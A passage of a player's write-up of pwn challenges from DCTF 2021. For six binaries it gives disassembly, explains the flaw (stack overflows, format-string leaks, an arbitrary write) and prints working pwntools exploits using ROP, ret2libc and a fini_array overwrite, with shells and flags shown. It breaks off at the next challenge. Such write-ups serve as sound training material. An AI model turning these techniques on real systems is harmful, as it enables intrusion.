DCTF - 2021
I played this CTF event with the WeakButLeet team and in the end, we managed to get 18th rank, sadly we couldn’t do much crypto challenges but overall it was a fun CTF to get refreshed, there were other CTFs running as well but I only played this as there was a local CTF going on. In the end, I manage to solve 7/8 pwn challenges and remaining one was solved by Faith, super talented guy.
Pwn Sanity Check #
This was more of a sanity check challenge for the pwn challenges, this was ridiculously easy:-
gef➤ disas main
Dump of assembler code for function main:
0x000000000040078c <+0>: push rbp
0x000000000040078d <+1>: mov rbp,rsp
0x0000000000400790 <+4>: mov edi,0xa
0x0000000000400795 <+9>: mov eax,0x0
0x000000000040079a <+14>: call 0x400580 <alarm@plt>
0x000000000040079f <+19>: mov eax,0x0
0x00000000004007a4 <+24>: call 0x400730 <vuln>
0x00000000004007a9 <+29>: mov eax,0x0
0x00000000004007ae <+34>: pop rbp
0x00000000004007af <+35>: ret
End of assembler dump.
gef➤ disas vuln
Dump of assembler code for function vuln:
0x0000000000400730 <+0>: push rbp
0x0000000000400731 <+1>: mov rbp,rsp
0x0000000000400734 <+4>: sub rsp,0x40
0x0000000000400738 <+8>: lea rdi,[rip+0x1d1] # 0x400910
0x000000000040073f <+15>: call 0x400550 <puts@plt>
0x0000000000400744 <+20>: mov rdx,QWORD PTR [rip+0x200915] # 0x601060 <stdin@@GLIBC_2.2.5>
0x000000000040074b <+27>: lea rax,[rbp-0x40]
0x000000000040074f <+31>: mov esi,0x100
0x0000000000400754 <+36>: mov rdi,rax
0x0000000000400757 <+39>: call 0x400590 <fgets@plt>
0x000000000040075c <+44>: cmp DWORD PTR [rbp-0x4],0xdeadc0de
0x0000000000400763 <+51>: jne 0x40077d <vuln+77>
0x0000000000400765 <+53>: lea rdi,[rip+0x1b4] # 0x400920
0x000000000040076c <+60>: call 0x400550 <puts@plt>
0x0000000000400771 <+65>: mov eax,0x0
0x0000000000400776 <+70>: call 0x4006f4 <shell>
0x000000000040077b <+75>: jmp 0x400789 <vuln+89>
0x000000000040077d <+77>: lea rdi,[rip+0x1c1] # 0x400945
0x0000000000400784 <+84>: call 0x400550 <puts@plt>
0x0000000000400789 <+89>: nop
0x000000000040078a <+90>: leave
0x000000000040078b <+91>: ret
First off the main function calls the vuln function which takes the input from the fgets, there was a buffer overflow vulnerability in the fgets call since the buffer was of size 0x40, while the size fgets takes is 0x100 making it vulnerable to stack overflow. In the vuln function it checks if the rbp - 0x4 has the value 0xdeadc0de which calls the shell function it the value turns out to be same but the shell function wasn’t spawning shell, it turns out to be troll function. Next up, there was a win function:-
Dump of assembler code for function win:
0x0000000000400697 <+0>: push rbp
0x0000000000400698 <+1>: mov rbp,rsp
0x000000000040069b <+4>: sub rsp,0x10
0x000000000040069f <+8>: mov DWORD PTR [rbp-0x4],edi
0x00000000004006a2 <+11>: mov DWORD PTR [rbp-0x8],esi
0x00000000004006a5 <+14>: lea rdi,[rip+0x18c] # 0x400838
0x00000000004006ac <+21>: call 0x400550 <puts@plt>
0x00000000004006b1 <+26>: cmp DWORD PTR [rbp-0x4],0xdeadbeef
0x00000000004006b8 <+33>: jne 0x4006f1 <win+90>
0x00000000004006ba <+35>: lea rdi,[rip+0x1b7] # 0x400878
0x00000000004006c1 <+42>: call 0x400550 <puts@plt>
0x00000000004006c6 <+47>: cmp DWORD PTR [rbp-0x8],0x1337c0de
0x00000000004006cd <+54>: jne 0x4006f1 <win+90>
0x00000000004006cf <+56>: lea rdi,[rip+0x1b7] # 0x40088d
0x00000000004006d6 <+63>: call 0x400550 <puts@plt>
0x00000000004006db <+68>: lea rdi,[rip+0x1bc] # 0x40089e
0x00000000004006e2 <+75>: call 0x400560 <system@plt>
0x00000000004006e7 <+80>: mov edi,0x0
0x00000000004006ec <+85>: call 0x4005a0 <exit@plt>
0x00000000004006f1 <+90>: nop
0x00000000004006f2 <+91>: leave
0x00000000004006f3 <+92>: ret
This function spawns a shell /bin/sh but only if the given argument to the function will be equivalent to 0xdeadbeef and 0x1337c0de respectively. In order to do so, we find the gadgets using ropper, since the binary is 64 bit, the calling convention of the 64 bit architecture says 1st argument for a function calls goes to the rdi while the second goes to rsi and so on. We find two useful gadgets here:-
0x0000000000400813: pop rdi; ret;
0x0000000000400811: pop rsi; pop r15; ret;
Now, we can just create a ROP chain and give the value 0xdeadbeef to the rdi and 0x1337c0de to the rsi and give any junk value to the r15 since it doesn’t matter what r15 holds, the exploit was as follows:-
py
from pwn import *
p = remote("dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io", 7480)
payload = b"A"*72
payload += p64(0x0000000000400813)
payload += p64(0xdeadbeef)
payload += p64(0x0000000000400811)
payload += p64(0x1337c0de)*2
payload += p64(0x400697)
p.recvline()
p.sendline(payload)
p.interactive()
Running the exploit:-
❯ python3 pwn_sanity.py
[+] Opening connection to dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io on port 7480: Done
[*] Switching to interactive mode
will this work?
you made it to win land, no free handouts this time, try harder
one down, one to go!
2/2 bro good job
$ cat flag.txt
dctf{Ju5t_m0v3_0n}
$
Pinch Me
This challenge was also simple, loading the binary in gdb and checking the functions it contains, we can see that there’s a main function and vuln functions which are of interest:-
gef➤ disas main
Dump of assembler code for function main:
0x00000000004011d5 <+0>: push rbp
0x00000000004011d6 <+1>: mov rbp,rsp
0x00000000004011d9 <+4>: mov edi,0xa
0x00000000004011de <+9>: call 0x401050 <alarm@plt>
0x00000000004011e3 <+14>: mov eax,0x0
0x00000000004011e8 <+19>: call 0x401152 <vuln>
0x00000000004011ed <+24>: mov eax,0x0
0x00000000004011f2 <+29>: pop rbp
0x00000000004011f3 <+30>: ret
End of assembler dump.
gef➤ disas vuln
Dump of assembler code for function vuln:
0x0000000000401152 <+0>: push rbp
0x0000000000401153 <+1>: mov rbp,rsp
0x0000000000401156 <+4>: sub rsp,0x20
0x000000000040115a <+8>: mov DWORD PTR [rbp-0x4],0x1234567
0x0000000000401161 <+15>: mov DWORD PTR [rbp-0x8],0x89abcdef
0x0000000000401168 <+22>: lea rdi,[rip+0xe99] # 0x402008
0x000000000040116f <+29>: call 0x401030 <puts@plt>
0x0000000000401174 <+34>: lea rdi,[rip+0xebd] # 0x402038
0x000000000040117b <+41>: call 0x401030 <puts@plt>
0x0000000000401180 <+46>: mov rdx,QWORD PTR [rip+0x2ec9] # 0x404050 <stdin@@GLIBC_2.2.5>
0x0000000000401187 <+53>: lea rax,[rbp-0x20]
0x000000000040118b <+57>: mov esi,0x64
0x0000000000401190 <+62>: mov rdi,rax
0x0000000000401193 <+65>: call 0x401060 <fgets@plt>
0x0000000000401198 <+70>: cmp DWORD PTR [rbp-0x8],0x1337c0de
0x000000000040119f <+77>: jne 0x4011af <vuln+93>
0x00000000004011a1 <+79>: lea rdi,[rip+0xe9f] # 0x402047
0x00000000004011a8 <+86>: call 0x401040 <system@plt>
0x00000000004011ad <+91>: jmp 0x4011d2 <vuln+128>
0x00000000004011af <+93>: cmp DWORD PTR [rbp-0x4],0x1234567
0x00000000004011b6 <+100>: je 0x4011c6 <vuln+116>
0x00000000004011b8 <+102>: lea rdi,[rip+0xe90] # 0x40204f
0x00000000004011bf <+109>: call 0x401030 <puts@plt>
0x00000000004011c4 <+114>: jmp 0x4011d2 <vuln+128>
0x00000000004011c6 <+116>: lea rdi,[rip+0xe93] # 0x402060
0x00000000004011cd <+123>: call 0x401030 <puts@plt>
0x00000000004011d2 <+128>: nop
0x00000000004011d3 <+129>: leave
0x00000000004011d4 <+130>: ret
End of assembler dump.
gef➤
The vuln function has an obvious buffer overflow as same as of the Pwn Sanity only the size changed yet the vulnerability remains the same, the function checks whether the variable stored at the rbp - 0x8 is equal to the 0x1337c0de and if it does calls system("/bin/sh"), so in order to do, we know that the buffer we control the input for is stored at rbp - 0x20 and the rbp - 0x8 was compared to the value of 0x1337c0de, so we can just do 0x20 - 0x8 to get the offset for the variable we need to control the input for which would be 0x20 - 0x8 = 24, hence 24 is the offset for the comparing value, then we can just grab the flag from the server:-
from pwn import *
p = remote("dctf1-chall-pinch-me.westeurope.azurecontainer.io", 7480)
payload = b"A"*24
payload += p32(0x1337c0de) # integer is 4 bytes, hence p32()
p.recvline()
p.sendline(payload)
p.interactive()
Run the exploit:-
r
❯ python3 pinch_me.py
[+] Opening connection to dctf1-chall-pinch-me.westeurope.azurecontainer.io on port 7480: Done
[*] Switching to interactive mode
Am I dreaming?
$ id
uid=1000(pilot) gid=1000(pilot) groups=1000(pilot)
$ cat flag.txt
dctf{y0u_kn0w_wh4t_15_h4pp3n1ng_b75?}$
[*] Interrupted
Readme #
This one was a very basic format string challenge, checking the vuln function:-
gef➤ disas vuln
Dump of assembler code for function vuln:
0x000000000000085a <+0>: push rbp
0x000000000000085b <+1>: mov rbp,rsp
0x000000000000085e <+4>: sub rsp,0x60
0x0000000000000862 <+8>: mov rax,QWORD PTR fs:0x28
0x000000000000086b <+17>: mov QWORD PTR [rbp-0x8],rax
0x000000000000086f <+21>: xor eax,eax
0x0000000000000871 <+23>: lea rsi,[rip+0x13c] # 0x9b4
0x0000000000000878 <+30>: lea rdi,[rip+0x137] # 0x9b6
0x000000000000087f <+37>: call 0x730 <fopen@plt>
0x0000000000000884 <+42>: mov QWORD PTR [rbp-0x58],rax
0x0000000000000888 <+46>: mov rdx,QWORD PTR [rbp-0x58]
0x000000000000088c <+50>: lea rax,[rbp-0x50]
0x0000000000000890 <+54>: mov esi,0x1c
0x0000000000000895 <+59>: mov rdi,rax
0x0000000000000898 <+62>: call 0x720 <fgets@plt>
0x000000000000089d <+67>: mov rax,QWORD PTR [rbp-0x58]
0x00000000000008a1 <+71>: mov rdi,rax
0x00000000000008a4 <+74>: call 0x6e0 <fclose@plt>
0x00000000000008a9 <+79>: lea rdi,[rip+0x10f] # 0x9bf
0x00000000000008b0 <+86>: call 0x6d0 <puts@plt>
0x00000000000008b5 <+91>: mov rdx,QWORD PTR [rip+0x200754] # 0x201010 <stdin@@GLIBC_2.2.5>
0x00000000000008bc <+98>: lea rax,[rbp-0x30]
0x00000000000008c0 <+102>: mov esi,0x1e
0x00000000000008c5 <+107>: mov rdi,rax
0x00000000000008c8 <+110>: call 0x720 <fgets@plt>
0x00000000000008cd <+115>: lea rdi,[rip+0x104] # 0x9d8
0x00000000000008d4 <+122>: mov eax,0x0
0x00000000000008d9 <+127>: call 0x700 <printf@plt>
0x00000000000008de <+132>: lea rax,[rbp-0x30]
0x00000000000008e2 <+136>: mov rdi,rax
0x00000000000008e5 <+139>: mov eax,0x0
0x00000000000008ea <+144>: call 0x700 <printf@plt>
0x00000000000008ef <+149>: nop
0x00000000000008f0 <+150>: mov rax,QWORD PTR [rbp-0x8]
0x00000000000008f4 <+154>: xor rax,QWORD PTR fs:0x28
0x00000000000008fd <+163>: je 0x904 <vuln+170>
0x00000000000008ff <+165>: call 0x6f0 <__stack_chk_fail@plt>
0x0000000000000904 <+170>: leave
0x0000000000000905 <+171>: ret
End of assembler dump.
gef➤
We can see it opens the flag.txt file via fopen and read the flag from the file and store it on the stack, then it takes he input via fgets and then print the given input via printf without any format specifier, this proposed the format string vulnerability and with that we can leak the values from the stack, since the flag is also stored on the stack, we can just as well leak it, using the following exploit, we can get flag:-
from pwn import *
from binascii import unhexlify
p = remote("dctf-chall-readme.westeurope.azurecontainer.io", 7481)
p.recvline()
p.sendline("%8$lx-%9$lx-%10$lx-%11$x")
p.recvuntil("hello ")
output = p.recvline().strip().split(b"-")
flag = [unhexlify(x)[::-1] for x in output]
print(b"".join(flag)+b"}")
p.close()
Running the exploit:-
r
❯ python3 readme.py
[+] Opening connection to dctf-chall-readme.westeurope.azurecontainer.io on port 7481: Done
b'dctf{n0w_g0_r3ad_s0me_b00k5}'
[*] Closed connection to dctf-chall-readme.westeurope.azurecontainer.io port 7481
Baby BOF #
Baby BOF was normal return to libc attack, since the dockerfile is provided with the challenge which showed that the binary is running in the Ubuntu 20.04 container, hinting that the libc here used is LIBC 2.31, checking the vuln function:-
gef➤ disas vuln
Dump of assembler code for function vuln:
0x00000000004005b7 <+0>: push rbp
0x00000000004005b8 <+1>: mov rbp,rsp
0x00000000004005bb <+4>: sub rsp,0x10
0x00000000004005bf <+8>: lea rdi,[rip+0xde] # 0x4006a4
0x00000000004005c6 <+15>: call 0x4004a0 <puts@plt>
0x00000000004005cb <+20>: mov rdx,QWORD PTR [rip+0x200a6e] # 0x601040 <stdin@@GLIBC_2.2.5>
0x00000000004005d2 <+27>: lea rax,[rbp-0xa]
0x00000000004005d6 <+31>: mov esi,0x100
0x00000000004005db <+36>: mov rdi,rax
0x00000000004005de <+39>: call 0x4004c0 <fgets@plt>
0x00000000004005e3 <+44>: lea rdi,[rip+0xcb] # 0x4006b5
0x00000000004005ea <+51>: call 0x4004a0 <puts@plt>
0x00000000004005ef <+56>: nop
0x00000000004005f0 <+57>: leave
0x00000000004005f1 <+58>: ret
Again, the fgets function call is vulnerable here, we can see that the buffer is of size 0xa while the size acceptable was 0x100 making it vulnerable to buffer overflow. Now, for the ret2libc part, I would recommend you to start reading here.
The process is exact same, leak the GOT address of the puts and call main again and call system("/bin/sh"):-
from pwn import *
p = remote("dctf-chall-baby-bof.westeurope.azurecontainer.io", 7481)
elf = ELF("baby_bof")
libc= elf.libc
payload = b"A"*18
payload += p64(0x0000000000400683)
payload += p64(elf.got['alarm'])
payload += p64(elf.plt['puts'])
payload += p64(elf.symbols['main'])
p.recvline()
p.sendline(payload)
p.recvline()
libc.address = u64(p.recv(6).ljust(8, b"\x00")) - libc.symbols['alarm']
print(hex(libc.address))
payload = b"A"*18
payload += p64(0x000000000040048e)
payload += p64(0x0000000000400683)
payload += p64(next(libc.search(b"/bin/sh\x00")))
payload += p64(libc.symbols['system'])
p.sendline(payload)
p.interactive()
Running the exploit:-
❯ python3 baby_bof.py
[+] Opening connection to dctf-chall-baby-bof.westeurope.azurecontainer.io on port 7481: Done
[*] '/home/d4mianwayne/Pwning/CTFs/dctf/baby_bof'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/usr/lib/x86_64-linux-gnu/libc-2.31.so'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
0x7f37b1589000
[*] Switching to interactive mode
plz don't rop me
i don't think this will work
$ cat flag.txt
dctf{D0_y0U_H4v3_A_T3mpl4t3_f0R_tH3s3}
$
[*] Interrupted
Magic Trick #
This was kind of a good challenge, well kind of, first check the security mechanisms:-
gef➤ checksec
[+] checksec for '/home/d4mianwayne/Pwning/CTFs/dctf/magic_trick'
Canary : ✓
NX : ✓
PIE : ✘
Fortify : ✘
RelRO : ✘
gef➤
Now, this shows off that that there’s Canary and NX protection while the PIE and RELRO is disabled, this means we can write the _fini_array or any of the Global Offset Table entries. The main function calls the magic function, checking it:-
gef➤ disas magic
Dump of assembler code for function magic:
0x000000000040068d <+0>: push rbp
0x000000000040068e <+1>: mov rbp,rsp
0x0000000000400691 <+4>: sub rsp,0x20
0x0000000000400695 <+8>: mov rax,QWORD PTR fs:0x28
0x000000000040069e <+17>: mov QWORD PTR [rbp-0x8],rax
0x00000000004006a2 <+21>: xor eax,eax
0x00000000004006a4 <+23>: lea rdi,[rip+0x15e] # 0x400809
0x00000000004006ab <+30>: call 0x400520 <puts@plt>
0x00000000004006b0 <+35>: lea rax,[rbp-0x20]
0x00000000004006b4 <+39>: mov rsi,rax
0x00000000004006b7 <+42>: lea rdi,[rip+0x165] # 0x400823
0x00000000004006be <+49>: mov eax,0x0
0x00000000004006c3 <+54>: call 0x400560 <__isoc99_scanf@plt>
0x00000000004006c8 <+59>: lea rdi,[rip+0x159] # 0x400828
0x00000000004006cf <+66>: call 0x400520 <puts@plt>
0x00000000004006d4 <+71>: lea rax,[rbp-0x18]
0x00000000004006d8 <+75>: mov rsi,rax
0x00000000004006db <+78>: lea rdi,[rip+0x141] # 0x400823
0x00000000004006e2 <+85>: mov eax,0x0
0x00000000004006e7 <+90>: call 0x400560 <__isoc99_scanf@plt>
0x00000000004006ec <+95>: lea rdi,[rip+0x153] # 0x400846
0x00000000004006f3 <+102>: call 0x400520 <puts@plt>
0x00000000004006f8 <+107>: mov rax,QWORD PTR [rbp-0x18]
0x00000000004006fc <+111>: mov QWORD PTR [rbp-0x10],rax
0x0000000000400700 <+115>: mov rdx,QWORD PTR [rbp-0x20]
0x0000000000400704 <+119>: mov rax,QWORD PTR [rbp-0x10]
0x0000000000400708 <+123>: mov QWORD PTR [rax],rdx
0x000000000040070b <+126>: nop
0x000000000040070c <+127>: mov rax,QWORD PTR [rbp-0x8]
0x0000000000400710 <+131>: xor rax,QWORD PTR fs:0x28
0x0000000000400719 <+140>: je 0x400720 <magic+147>
0x000000000040071b <+142>: call 0x400530 <__stack_chk_fail@plt>
0x0000000000400720 <+147>: leave
0x0000000000400721 <+148>: ret
We can see that the program calls scanf two times and take unsigned long long, first it takes a value, second input takes another input and attempt to write the value given by the first input to the address of the second input, that means it allow us to write any value to any address having r/w access to. Since the RELRO is disabled, we can overwrite the destructors which will be run once the process will come to an end to the address of the win function which prints the flag:-
from pwn import *
p = remote("dctf-chall-magic-trick.westeurope.azurecontainer.io", 7481)
elf = ELF("magic_trick")
p.recvline()
p.recvline()
p.recvline()
p.sendline(str(elf.symbols['win']))
p.recvline()
p.sendline(str(elf.symbols['__do_global_dtors_aux_fini_array_entry']))
p.interactive()
Running the exploit:-
❯ python3 magic_trick.py
[+] Opening connection to dctf-chall-magic-trick.westeurope.azurecontainer.io on port 7481: Done
[*] '/home/d4mianwayne/Pwning/CTFs/ductf/magic_trick'
Arch: amd64-64-little
RELRO: No RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] Switching to interactive mode
thanks
You are a real magician
dctf{1_L1k3_M4G1c}
[*] Got EOF while reading in interactive
$
[*] Interrupted
Hotel ROP #
This was yet another ROP challenge but kind of a twist on it, it has PIE and NX enabled but the Canary was disabled:-
gef➤ checksec
[+] checksec for '/home/d4mianwayne/Pwning/CTFs/ductf/hotel_rop'
Canary : ✘
NX : ✓
PIE : ✓
Fortify : ✘
RelRO : Partial
Now, checking the function it contains, we can see there are several user-defined functions:-
gef➤ i functions
All defined functions:
Non-debugging symbols:
0x0000000000001000 _init
0x0000000000001030 puts@plt
0x0000000000001040 system@plt
0x0000000000001050 printf@plt
0x0000000000001060 alarm@plt
0x0000000000001070 fgets@plt
0x0000000000001080 exit@plt
0x0000000000001090 __cxa_finalize@plt
0x00000000000010a0 _start
0x00000000000010d0 deregister_tm_clones
0x0000000000001100 register_tm_clones
0x0000000000001140 __do_global_dtors_aux
0x0000000000001180 frame_dummy
0x0000000000001185 loss
0x00000000000011dc california
0x0000000000001283 silicon_valley
0x000000000000131e vuln
0x000000000000136d main
0x00000000000013b0 __libc_csu_init
0x0000000000001410 __libc_csu_fini
0x0000000000001414 _fini
gef➤
Checking for the function named main function, we can see it prints the address of the main function, so much for the PIE security, PIE can bypassed since we get the address of the function, we can obtain the base address of the ELF itself. Then it calls the function vuln:-
gef➤ disas main
Dump of assembler code for function main:
0x000000000000136d <+0>: push rbp
0x000000000000136e <+1>: mov rbp,rsp
0x0000000000001371 <+4>: mov edi,0xa
0x0000000000001376 <+9>: call 0x1060 <alarm@plt>
0x000000000000137b <+14>: lea rsi,[rip+0xffffffffffffffeb] # 0x136d <main>
0x0000000000001382 <+21>: lea rdi,[rip+0xdb7] # 0x2140
0x0000000000001389 <+28>: mov eax,0x0
0x000000000000138e <+33>: call 0x1050 <printf@plt>
0x0000000000001393 <+38>: mov eax,0x0
0x0000000000001398 <+43>: call 0x131e <vuln>
0x000000000000139d <+48>: mov eax,0x0
0x00000000000013a2 <+53>: pop rbp
0x00000000000013a3 <+54>: ret
End of assembler dump.
gef➤ disas vuln
Dump of assembler code for function vuln:
0x000000000000131e <+0>: push rbp
0x000000000000131f <+1>: mov rbp,rsp
0x0000000000001322 <+4>: sub rsp,0x20
0x0000000000001326 <+8>: lea rdi,[rip+0xda3] # 0x20d0
0x000000000000132d <+15>: call 0x1030 <puts@plt>
0x0000000000001332 <+20>: mov rdx,QWORD PTR [rip+0x2d27] # 0x4060 <stdin@@GLIBC_2.2.5>
0x0000000000001339 <+27>: lea rax,[rbp-0x20]
0x000000000000133d <+31>: mov esi,0x100
0x0000000000001342 <+36>: mov rdi,rax
0x0000000000001345 <+39>: call 0x1070 <fgets@plt>
0x000000000000134a <+44>: cmp DWORD PTR [rbp-0x4],0x0
0x000000000000134e <+48>: je 0x135e <vuln+64>
0x0000000000001350 <+50>: lea rdi,[rip+0xd91] # 0x20e8
0x0000000000001357 <+57>: call 0x1030 <puts@plt>
0x000000000000135c <+62>: jmp 0x136b <vuln+77>
0x000000000000135e <+64>: lea rdi,[rip+0xdb3] # 0x2118
0x0000000000001365 <+71>: call 0x1030 <puts@plt>
0x000000000000136a <+76>: nop
0x000000000000136b <+77>: leave
0x000000000000136c <+78>: ret
End of assembler dump.
The vuln function was calling the fgets and the given size to the fgets more than the buffer could hold, so it was a stack overflow. Secondly, there were two other functions:-
gef➤ disas california
Dump of assembler code for function california:
0x00000000000011dc <+0>: push rbp
0x00000000000011dd <+1>: mov rbp,rsp
0x00000000000011e0 <+4>: lea rdi,[rip+0xe72] # 0x2059
0x00000000000011e7 <+11>: call 0x1030 <puts@plt>
0x00000000000011ec <+16>: lea rdi,[rip+0xe85] # 0x2078
0x00000000000011f3 <+23>: call 0x1030 <puts@plt>
0x00000000000011f8 <+28>: mov eax,DWORD PTR [rip+0x2e7a] # 0x4078 <len>
0x00000000000011fe <+34>: cdqe
0x0000000000001200 <+36>: lea rdx,[rip+0x2e69] # 0x4070 <win_land>
0x0000000000001207 <+43>: mov BYTE PTR [rax+rdx*1],0x2f
0x000000000000120b <+47>: mov eax,DWORD PTR [rip+0x2e67] # 0x4078 <len>
0x0000000000001211 <+53>: add eax,0x1
0x0000000000001214 <+56>: mov DWORD PTR [rip+0x2e5e],eax # 0x4078 <len>
0x000000000000121a <+62>: mov eax,DWORD PTR [rip+0x2e58] # 0x4078 <len>
0x0000000000001220 <+68>: cdqe
0x0000000000001222 <+70>: lea rdx,[rip+0x2e47] # 0x4070 <win_land>
0x0000000000001229 <+77>: mov BYTE PTR [rax+rdx*1],0x62
0x000000000000122d <+81>: mov eax,DWORD PTR [rip+0x2e45] # 0x4078 <len>
0x0000000000001233 <+87>: add eax,0x1
0x0000000000001236 <+90>: mov DWORD PTR [rip+0x2e3c],eax # 0x4078 <len>
0x000000000000123c <+96>: mov eax,DWORD PTR [rip+0x2e36] # 0x4078 <len>
0x0000000000001242 <+102>: cdqe
0x0000000000001244 <+104>: lea rdx,[rip+0x2e25] # 0x4070 <win_land>
0x000000000000124b <+111>: mov BYTE PTR [rax+rdx*1],0x69
0x000000000000124f <+115>: mov eax,DWORD PTR [rip+0x2e23] # 0x4078 <len>
0x0000000000001255 <+121>: add eax,0x1
0x0000000000001258 <+124>: mov DWORD PTR [rip+0x2e1a],eax # 0x4078 <len>
0x000000000000125e <+130>: mov eax,DWORD PTR [rip+0x2e14] # 0x4078 <len>
0x0000000000001264 <+136>: cdqe
0x0000000000001266 <+138>: lea rdx,[rip+0x2e03] # 0x4070 <win_land>
0x000000000000126d <+145>: mov BYTE PTR [rax+rdx*1],0x6e
0x0000000000001271 <+149>: mov eax,DWORD PTR [rip+0x2e01] # 0x4078 <len>
0x0000000000001277 <+155>: add eax,0x1
0x000000000000127a <+158>: mov DWORD PTR [rip+0x2df8],eax # 0x4078 <len>
0x0000000000001280 <+164>: nop
0x0000000000001281 <+165>: pop rbp
0x0000000000001282 <+166>: ret
End of assembler dump.
gef➤ disas silicon_valley
Dump of assembler code for function silicon_valley:
0x0000000000001283 <+0>: push rbp
0x0000000000001284 <+1>: mov rbp,rsp
0x0000000000001287 <+4>: lea rdi,[rip+0xe25] # 0x20b3
0x000000000000128e <+11>: call 0x1030 <puts@plt>
0x0000000000001293 <+16>: mov eax,DWORD PTR [rip+0x2ddf] # 0x4078 <len>
0x0000000000001299 <+22>: cdqe
0x000000000000129b <+24>: lea rdx,[rip+0x2dce] # 0x4070 <win_land>
0x00000000000012a2 <+31>: mov BYTE PTR [rax+rdx*1],0x2f
0x00000000000012a6 <+35>: mov eax,DWORD PTR [rip+0x2dcc] # 0x4078 <len>
0x00000000000012ac <+41>: add eax,0x1
0x00000000000012af <+44>: mov DWORD PTR [rip+0x2dc3],eax # 0x4078 <len>
0x00000000000012b5 <+50>: mov eax,DWORD PTR [rip+0x2dbd] # 0x4078 <len>
0x00000000000012bb <+56>: cdqe
0x00000000000012bd <+58>: lea rdx,[rip+0x2dac] # 0x4070 <win_land>
0x00000000000012c4 <+65>: mov BYTE PTR [rax+rdx*1],0x73
0x00000000000012c8 <+69>: mov eax,DWORD PTR [rip+0x2daa] # 0x4078 <len>
0x00000000000012ce <+75>: add eax,0x1
0x00000000000012d1 <+78>: mov DWORD PTR [rip+0x2da1],eax # 0x4078 <len>
0x00000000000012d7 <+84>: mov eax,DWORD PTR [rip+0x2d9b] # 0x4078 <len>
0x00000000000012dd <+90>: cdqe
0x00000000000012df <+92>: lea rdx,[rip+0x2d8a] # 0x4070 <win_land>
0x00000000000012e6 <+99>: mov BYTE PTR [rax+rdx*1],0x68
0x00000000000012ea <+103>: mov eax,DWORD PTR [rip+0x2d88] # 0x4078 <len>
0x00000000000012f0 <+109>: add eax,0x1
0x00000000000012f3 <+112>: mov DWORD PTR [rip+0x2d7f],eax # 0x4078 <len>
0x00000000000012f9 <+118>: mov eax,DWORD PTR [rip+0x2d79] # 0x4078 <len>
0x00000000000012ff <+124>: cdqe
0x0000000000001301 <+126>: lea rdx,[rip+0x2d68] # 0x4070 <win_land>
0x0000000000001308 <+133>: mov BYTE PTR [rax+rdx*1],0x0
0x000000000000130c <+137>: mov eax,DWORD PTR [rip+0x2d66] # 0x4078 <len>
0x0000000000001312 <+143>: add eax,0x1
0x0000000000001315 <+146>: mov DWORD PTR [rip+0x2d5d],eax # 0x4078 <len>
0x000000000000131b <+152>: nop
0x000000000000131c <+153>: pop rbp
0x000000000000131d <+154>: ret
End of assembler dump.
gef➤
The california function adds the 4 bytes to the win_land global variable, the 4 bytes were /bin and the next function named silicon_valley adds the remaining 4 bytes /sh\x00 to the win_land making the win_land equals to the /bin/shx00, then there was another function named loss, which was as following:-
gef➤ disas loss
Dump of assembler code for function loss:
0x0000000000001185 <+0>: push rbp
0x0000000000001186 <+1>: mov rbp,rsp
0x0000000000001189 <+4>: sub rsp,0x10
0x000000000000118d <+8>: mov DWORD PTR [rbp-0x4],edi
0x0000000000001190 <+11>: mov DWORD PTR [rbp-0x8],esi
0x0000000000001193 <+14>: mov edx,DWORD PTR [rbp-0x4]
0x0000000000001196 <+17>: mov eax,DWORD PTR [rbp-0x8]
0x0000000000001199 <+20>: add eax,edx
0x000000000000119b <+22>: cmp eax,0xdeadc0de
0x00000000000011a0 <+27>: jne 0x11d9 <loss+84>
0x00000000000011a2 <+29>: lea rdi,[rip+0xe5f] # 0x2008
0x00000000000011a9 <+36>: call 0x1030 <puts@plt>
0x00000000000011ae <+41>: cmp DWORD PTR [rbp-0x4],0x1337c0de
0x00000000000011b5 <+48>: jne 0x11d9 <loss+84>
0x00000000000011b7 <+50>: lea rdi,[rip+0xe7a] # 0x2038
0x00000000000011be <+57>: call 0x1030 <puts@plt>
0x00000000000011c3 <+62>: lea rdi,[rip+0x2ea6] # 0x4070 <win_land>
0x00000000000011ca <+69>: call 0x1040 <system@plt>
0x00000000000011cf <+74>: mov edi,0x0
0x00000000000011d4 <+79>: call 0x1080 <exit@plt>
0x00000000000011d9 <+84>: nop
0x00000000000011da <+85>: leave
0x00000000000011db <+86>: ret
End of assembler dump.
gef➤
There’s some twist to the loss function, first it expects 2 arguments from the function call then it checks if the sum of 1st and 2nd argument is equals to the 0xdeadc0de if it is, then check if the first argument is equal to the 0x1337c0de once it is, calls the system with the win_land as it’s argument. In order to exploit this, with the gef we find the offset which was 0x28. then we must call californiaand silicon_valley respectively to make the win_land variable equals to /bin/sh then call the loss function.
During the call of the loss function, since we know that it expects the 1st argument to be the 0x1337c0de and the sum of 1st and 2nd should be 0xdeadc0de, we can just find the right value for the second argument by subtracting the 0xdeadc0de from the 0x1337c0de which will be:-
gef➤ p 0xdeadc0de - 0x1337c0de
$4 = 0xcb760000
gef➤
Now, the exploit will be:-
from pwn import*
p = remote("dctf1-chall-hotel-rop.westeurope.azurecontainer.io", 7480)
elf = ELF("hotel_rop")
p.recvuntil("Welcome to Hotel ROP, on main street ")
elf.address = int(p.recvline().strip(), 16) - 0x136d
print(hex(elf.address))
payload = b"A"*40
payload += p64(elf.symbols['california'])
payload += p64(elf.symbols['silicon_valley'])
payload += p64(elf.address + 0x000000000000140b)
payload += p64(0x1337c0de)
payload += p64(elf.address + 0x0000000000001409)
payload += p64(0xcb760000)*2
payload += p64(elf.symbols['loss'])
p.send(payload)
p.interactive()
Running the exploit:-
❯ python3 hotel_rop.py
[+] Opening connection to dctf1-chall-hotel-rop.westeurope.azurecontainer.io on port 7480: Done
[*] '/home/d4mianwayne/Pwning/CTFs/ductf/hotel_rop'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
0x564fdcdc6000
[*] Switching to interactive mode
You come here often?
I think you should come here more often.
Welcome to Hotel California
You can sign out anytime you want, but you can never leave
You want to work for Google?
$ id
uid=1000(pilot) gid=1000(pilot) groups=1000(pilot)
$ cat flag.txt
dctf{ch41n_0f_h0t3ls}$
[*] Interrupted
Formats last theorem #
This was another format string challenge, performing the checksec on the binary we get the:-
gef➤ checksec
